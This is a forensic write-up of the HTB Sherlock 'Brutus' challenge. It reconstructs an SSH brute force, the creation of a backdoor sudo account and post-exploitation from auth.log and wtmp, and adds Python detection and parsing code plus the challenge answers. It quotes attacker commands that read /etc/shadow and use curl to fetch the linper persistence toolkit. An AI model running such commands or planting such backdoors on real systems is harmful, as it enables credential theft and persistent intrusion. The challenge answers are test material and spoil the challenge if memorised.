HTB Sherlock - Brutus
Author: Alcidius
March 04, 2026
Scenario
In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We’ll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.
Summary: An attacker brute-forced their way into a Confluence server over SSH, then used that foothold to escalate privileges and establish persistence.
Challenge Info
| Field | Details |
|---|---|
| Category | DFIR |
| Difficulty | Very Easy |
Investigation
Initial Analysis
The provided artefact ZIP contains:
├── Brutus
│ ├── auth.log
│ ├── utmp.py
│ ├── wtmp
│ └── wtmp.csv
I started by looking at the authentication log, which clearly showed a large number of failed logins, indicating a brute-force attack. The attempts follow each other in quick succession, which points to an automated tool rather than a person typing passwords. All of the attempts originated from the IP address 65.2.161.68.
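The pattern described above (many failures from one source in a short window, then a lone success) is easy to turn into detection logic. The following is an added example, not part of the original write-up or of the Sherlock's files: it parses sshd lines from auth.log, flags any source IP with a burst of failures inside a sliding window, and reports the first accepted login from that IP. The log excerpt is constructed for the example (hostname, PIDs and ports are made up, and the syslog year is assumed to be 2024 because auth.log timestamps carry no year).

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt, not the Sherlock's file: hostname, PIDs and ports are
# made up; the attacker IP and the timing follow the investigation above.
SAMPLE_AUTH_LOG = """\
Mar  6 06:10:02 confluence-srv sshd[2001]: Failed password for admin from 203.0.113.9 port 51000 ssh2
Mar  6 06:31:33 confluence-srv sshd[2325]: Invalid user admin from 65.2.161.68 port 46380
Mar  6 06:31:33 confluence-srv sshd[2325]: Failed password for invalid user admin from 65.2.161.68 port 46380 ssh2
Mar  6 06:31:34 confluence-srv sshd[2327]: Failed password for root from 65.2.161.68 port 46392 ssh2
Mar  6 06:31:34 confluence-srv sshd[2329]: Failed password for backup from 65.2.161.68 port 46400 ssh2
Mar  6 06:31:35 confluence-srv sshd[2331]: Failed password for root from 65.2.161.68 port 46412 ssh2
Mar  6 06:31:35 confluence-srv sshd[2333]: Failed password for server_adm from 65.2.161.68 port 46420 ssh2
Mar  6 06:31:36 confluence-srv sshd[2335]: Failed password for root from 65.2.161.68 port 46434 ssh2
Mar  6 06:32:01 confluence-srv sshd[2401]: Accepted password for root from 65.2.161.68 port 46500 ssh2
Mar  6 06:32:44 confluence-srv sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
"""

# One regex covers both outcomes; "invalid user" only ever appears on failures.
AUTH_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_ssh_auth(text, year=2024):
    """Return a list of (timestamp, outcome, user, ip) for every password auth line.

    Syslog timestamps have no year, so the caller supplies it (assumed 2024 here).
    """
    events = []
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue  # session, cron, sudo and other lines are not auth attempts
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["outcome"], m["user"], m["ip"]))
    return events


def find_bruteforce(events, threshold=5, window_seconds=60):
    """Flag source IPs with at least `threshold` failures inside any `window_seconds` span.

    Returns {ip: summary}; the summary includes the first Accepted login from that
    IP, which is the moment the brute force succeeded.
    """
    by_ip = defaultdict(list)
    for ts, outcome, user, ip in events:
        by_ip[ip].append((ts, outcome, user))

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort()
        failures = [ts for ts, outcome, _ in evs if outcome == "Failed"]
        # Sliding window over the sorted failure times: largest burst in any window.
        burst, start = 0, 0
        for end in range(len(failures)):
            while (failures[end] - failures[start]).total_seconds() > window_seconds:
                start += 1
            burst = max(burst, end - start + 1)
        if burst < threshold:
            continue
        first_success = next(
            ((ts, user) for ts, outcome, user in evs if outcome == "Accepted"), None
        )
        findings[ip] = {
            "failed": len(failures),
            "max_failures_in_window": burst,
            "users_tried": sorted({user for _, outcome, user in evs if outcome == "Failed"}),
            "first_success": first_success,
        }
    return findings


if __name__ == "__main__":
    for ip, info in find_bruteforce(parse_ssh_auth(SAMPLE_AUTH_LOG)).items():
        ts, user = info["first_success"] or (None, None)
        print(f"{ip}: {info['failed']} failures ({info['max_failures_in_window']} within 60s), "
              f"users {info['users_tried']}, first success {ts} as {user}")
```

The single failure from 203.0.113.9 never reaches the threshold and is not reported; the burst from 65.2.161.68 is, together with the usernames it cycled through and the first accepted login. On a real host, run the same two functions over the whole of auth.log rather than an excerpt, and expect the threshold to need tuning for hosts that legitimately see many logins.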
Successful login
The first successful login occurred at 2024-03-06 06:32:01 UTC and opened a session that was closed immediately, which is the brute-force tool confirming a valid credential rather than the attacker interacting with the box. 43 seconds later a new login occurred and was assigned session number 37. That gap, together with the fact that the second session stayed open for several minutes, strongly suggests a manual login with the credentials obtained by the brute force.
Persistence
The attacker created an account on the machine named cyberjunkie and subsequently added it to the sudo group, giving the backdoor account root-equivalent privileges through sudo. The attacker then logged out, ending session 37, and logged back in as the new user, which was assigned session 49.
Post-exploitation
Within session 49, the user cyberjunkie read the /etc/shadow file with sudo cat. The user then ran sudo /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh; linper is a Linux persistence toolkit. Both commands are visible only because sudo logs every command it runs to auth.log; a command run from a plain shell leaves no trace there. Note that, as logged, the curl invocation has no -o option, so it only writes the script to the terminal: auth.log shows the fetch, not that the script was saved or executed.
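The session numbers, the account creation, the group change and the sudo commands discussed above all come from different auth.log line formats, and stitching them into one timeline is what answers Q4 to Q8. The following is an added example, not code from the original write-up: it extracts systemd-logind session open/close events, useradd and usermod lines and sudo command records, then maps session ids to users, lists additions to privileged groups, and lists every sudo command. The excerpt is constructed for the example (hostname and PIDs are made up; the useradd line is reconstructed from the group line in the table below rather than copied from the Sherlock), and the syslog year is assumed to be 2024.

```python
import re
from datetime import datetime

# Constructed auth.log excerpt, not the Sherlock's file: hostname and PIDs are made up,
# and the useradd line is reconstructed from the group creation entry.
SAMPLE_AUTH_LOG = """\
Mar  6 06:32:44 confluence-srv sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:32:44 confluence-srv systemd-logind[411]: New session 37 of user root.
Mar  6 06:34:18 confluence-srv groupadd[2586]: new group: name=cyberjunkie, GID=1002
Mar  6 06:34:18 confluence-srv useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash
Mar  6 06:35:15 confluence-srv usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar  6 06:37:24 confluence-srv systemd-logind[411]: Session 37 logged out. Waiting for processes to exit.
Mar  6 06:37:34 confluence-srv systemd-logind[411]: New session 49 of user cyberjunkie.
Mar  6 06:37:57 confluence-srv sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
Mar  6 06:39:38 confluence-srv sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
"""

# Syslog prefix: timestamp, hostname, then the message we classify.
TS_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ (?P<msg>.*)$")

# Each pattern is searched in the message part; the first match decides the event kind.
EVENT_RES = {
    "session_open": re.compile(r"systemd-logind\[\d+\]: New session (?P<sid>\d+) of user (?P<user>[^.\s]+)"),
    "session_close": re.compile(r"systemd-logind\[\d+\]: Session (?P<sid>\d+) logged out"),
    "user_add": re.compile(r"useradd\[\d+\]: new user: name=(?P<user>[^,]+)"),
    "group_add": re.compile(r"usermod\[\d+\]: add '(?P<user>[^']+)' to group '(?P<group>[^']+)'"),
    "sudo": re.compile(
        r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
        r"USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.+)$"
    ),
}

# Groups whose membership is effectively root; extend for the distribution at hand.
PRIVILEGED_GROUPS = {"sudo", "wheel", "admin", "root", "docker"}


def build_timeline(text, year=2024):
    """Return a time-ordered list of event dicts for the lines we care about."""
    events = []
    for line in text.splitlines():
        m = TS_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        for kind, rx in EVENT_RES.items():
            e = rx.search(m["msg"])
            if e:
                events.append({"ts": ts, "kind": kind, **e.groupdict()})
                break
    events.sort(key=lambda ev: ev["ts"])  # stable, so file order is kept within a second
    return events


def sessions(timeline):
    """Map session id -> user, open time and close time (None if never closed in the log)."""
    out = {}
    for ev in timeline:
        if ev["kind"] == "session_open":
            out[ev["sid"]] = {"user": ev["user"], "opened": ev["ts"], "closed": None}
        elif ev["kind"] == "session_close" and ev["sid"] in out:
            out[ev["sid"]]["closed"] = ev["ts"]
    return out


def privileged_group_adds(timeline):
    """(user, group) pairs where a user was added to a group that grants root-equivalent access."""
    return [(ev["user"], ev["group"]) for ev in timeline
            if ev["kind"] == "group_add" and ev["group"] in PRIVILEGED_GROUPS]


def sudo_commands(timeline, user=None):
    """(timestamp, user, command) for every sudo invocation, optionally for one user only."""
    return [(ev["ts"], ev["user"], ev["cmd"]) for ev in timeline
            if ev["kind"] == "sudo" and (user is None or ev["user"] == user)]


if __name__ == "__main__":
    tl = build_timeline(SAMPLE_AUTH_LOG)
    for sid, s in sessions(tl).items():
        closed = s["closed"].strftime("%H:%M:%S") if s["closed"] else "still open"
        print(f"session {sid}: {s['user']} opened {s['opened']:%H:%M:%S}, closed {closed}")
    for user, group in privileged_group_adds(tl):
        print(f"privilege grant: {user} added to {group}")
    for ts, user, cmd in sudo_commands(tl):
        print(f"{ts:%H:%M:%S} sudo {user}: {cmd}")
```

Because systemd-logind session ids are what ties a login to its later activity, keeping them in the timeline is what lets you say "the cat and curl happened in session 49, the one belonging to the backdoor account" rather than just "someone ran curl".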
Questions & Answers
Q1: Analyze the auth.log. What is the IP address used by the attacker to carry out a brute force attack?
Answer: 65.2.161.68
Reasoning: The IP address from which the frequent failed logins occurred was 65.2.161.68. The failed attempts stopped after a single successful one.
Q2: The bruteforce attempts were successful and attacker gained access to an account on the server. What is the username of the account?
Answer: root
Reasoning: The brute force produced one successful authentication whose session was closed immediately; 43 seconds later another login for the user root occurred from the same IP address.
Q3: Identify the UTC timestamp when the attacker logged in manually to the server and established a terminal session to carry out their objectives. The login time will be different than the authentication time, and can be found in the wtmp artifact.
Answer: 2024-03-06 06:32:45
Reasoning: The wtmp artefact keeps a historical record of logins and logouts. Parsing it with the provided utmp.py showed the root user logging in from the malicious IP address at the time above, one second after the auth.log authentication entry at 06:32:44, because wtmp records the moment the terminal session is established rather than the moment the password is accepted.
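The Sherlock ships its own utmp.py; the following is an added example, not that script or any other code from the original, showing what such a parser has to do. wtmp is a flat array of fixed-size struct utmp records, so the work is choosing the right struct layout, unpacking each record, and pairing a login (USER_PROCESS) with the next logout (DEAD_PROCESS) on the same tty line. The layout below is the 384-byte one glibc uses on 64-bit Linux, which is an assumption about the target; the sample records are constructed with the same packer and are not the Sherlock's wtmp.

```python
import struct
import sys
from datetime import datetime, timezone

# struct utmp as laid out by glibc on 64-bit Linux (384 bytes). This is an assumption
# about the target host; 32-bit or non-glibc systems use a different layout.
#   ut_type(h) pad(2) ut_pid(i) ut_line(32s) ut_id(4s) ut_user(32s) ut_host(256s)
#   ut_exit(hh) ut_session(i) ut_tv.tv_sec(i) ut_tv.tv_usec(i) ut_addr_v6(4i) unused(20s)
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20s"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384
USER_PROCESS, DEAD_PROCESS = 7, 8      # ut_type values for a login and a logout


def _cstr(raw):
    """Decode a NUL-padded fixed-width field."""
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def parse_wtmp(data):
    """Decode every full record in a wtmp blob into a dict; a trailing partial record is ignored."""
    records = []
    for off in range(0, len(data) - UTMP_SIZE + 1, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        records.append({
            "type": f[0], "pid": f[1], "line": _cstr(f[2]), "id": _cstr(f[3]),
            "user": _cstr(f[4]), "host": _cstr(f[5]),
            "time": datetime.fromtimestamp(f[9] + f[10] / 1_000_000, tz=timezone.utc),
        })
    return records


def sessions_from_wtmp(records):
    """Pair each USER_PROCESS login with the next DEAD_PROCESS on the same tty line."""
    open_by_line, out = {}, []
    for r in sorted(records, key=lambda rec: rec["time"]):
        if r["type"] == USER_PROCESS:
            open_by_line[r["line"]] = r
        elif r["type"] == DEAD_PROCESS and r["line"] in open_by_line:
            login = open_by_line.pop(r["line"])
            out.append({"user": login["user"], "host": login["host"], "line": r["line"],
                        "login": login["time"], "logout": r["time"]})
    for login in open_by_line.values():  # no logout record: still logged in, or log truncated
        out.append({"user": login["user"], "host": login["host"], "line": login["line"],
                    "login": login["time"], "logout": None})
    return out


def make_record(ut_type, pid, line, user, host, when):
    """Pack one record; used here only to build the constructed sample below."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, int(when.timestamp()), 0, 0, 0, 0, 0, b"")


# Constructed sample: a root login on pts/1 from the attacker IP at the wtmp time from Q3,
# closed at the session end time from Q7. Not the Sherlock's wtmp.
SAMPLE_WTMP = (
    make_record(USER_PROCESS, 2491, "pts/1", "root", "65.2.161.68",
                datetime(2024, 3, 6, 6, 32, 45, tzinfo=timezone.utc))
    + make_record(DEAD_PROCESS, 2491, "pts/1", "", "",
                  datetime(2024, 3, 6, 6, 37, 24, tzinfo=timezone.utc))
)


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_WTMP
    for s in sessions_from_wtmp(parse_wtmp(data)):
        logout = s["logout"].strftime("%H:%M:%S") if s["logout"] else "still logged in"
        print(f"{s['login']:%Y-%m-%d %H:%M:%S} {s['user']:<12} {s['line']:<8} "
              f"{s['host']:<16} logout {logout}")
```

Run it with a path to a wtmp file to parse a real one, or with no argument to see the constructed sample. Two practical caveats: if the record size is wrong for the host, every field after the first record will be garbage, so check that the file length is a multiple of 384 before trusting the output; and wtmp is a plain file that an attacker with root can truncate or edit, so treat it as corroboration for auth.log rather than as an independent source of truth.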
Q4: SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?
Answer: 37
Reasoning: The systemd-logind entry at 2024-03-06 06:32:44 reads New session 37 of user root (wtmp records the same login one second later, at 06:32:45). That line provides the answer.
Q5: The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?
Answer: cyberjunkie
Reasoning: Within the logs, a new user named cyberjunkie was created at 2024-03-06 06:34:18 and added to the sudo group at 06:35:15, which is the higher privilege the question refers to.
Q6: What is the MITRE ATT&CK sub-technique ID used for persistence by creating a new account?
Answer: T1136.001
Reasoning: MITRE ATT&CK states that “Adversaries may create an account to maintain access to victim systems”[1].
Q7: What time did the attacker’s first SSH session end according to auth.log?
Answer: 2024-03-06 06:37:24
Reasoning: Session 37 closed at the timestamp mentioned above.
Q8: The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?
Answer: /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
Reasoning: Two commands were executed through sudo. The first, cat /etc/shadow, reads the password hashes but downloads nothing. The second, shown above, fetches linper.sh, a Linux persistence toolkit, and is therefore the command the question asks for.
Used logs
| Timestamp | Details | Remarks |
|---|---|---|
| 2024-03-06 06:32:01 | pam_unix(cron:session): session opened for user confluence(uid=998) by (uid=0) | Time of the successful brute-force login; the quoted line is a cron session for the confluence service account at that moment, not the sshd authentication entry itself |
| 2024-03-06 06:32:44 | pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0) | attacker login |
| 2024-03-06 06:32:44 | systemd-logind[411]: New session 37 of user root | Created session associated with the login |
| 2024-03-06 06:34:18 | new group: name=cyberjunkie, GID=1002 | Primary group created alongside the new user cyberjunkie |
| 2024-03-06 06:35:15 | add ‘cyberjunkie’ to group ‘sudo’ | Added cyberjunkie to sudoers group |
| 2024-03-06 06:37:24 | Session 37 logged out. Waiting for processes to exit. | Closing of the attacker’s session |
| 2024-03-06 06:37:34 | New session 49 of user cyberjunkie. | Attacker login in newly created user |
| 2024-03-06 06:37:57 | sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow | Attacker reads shadow file |
| 2024-03-06 06:39:38 | sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh | acquisition of persistence toolkit |
Key Takeaways
- A brute-force attack is recognised by a high volume of failed logins from a single source in quick succession, typically followed by a lone success.
- Persistence can be gained simply by creating a new local user and giving it sudo rights.
- wtmp is very useful for tracking session-related events, and its timestamps can differ slightly from those in auth.log.
Footnotes
- [1] MITRE ATT&CK, T1136.001 (Create Account: Local Account)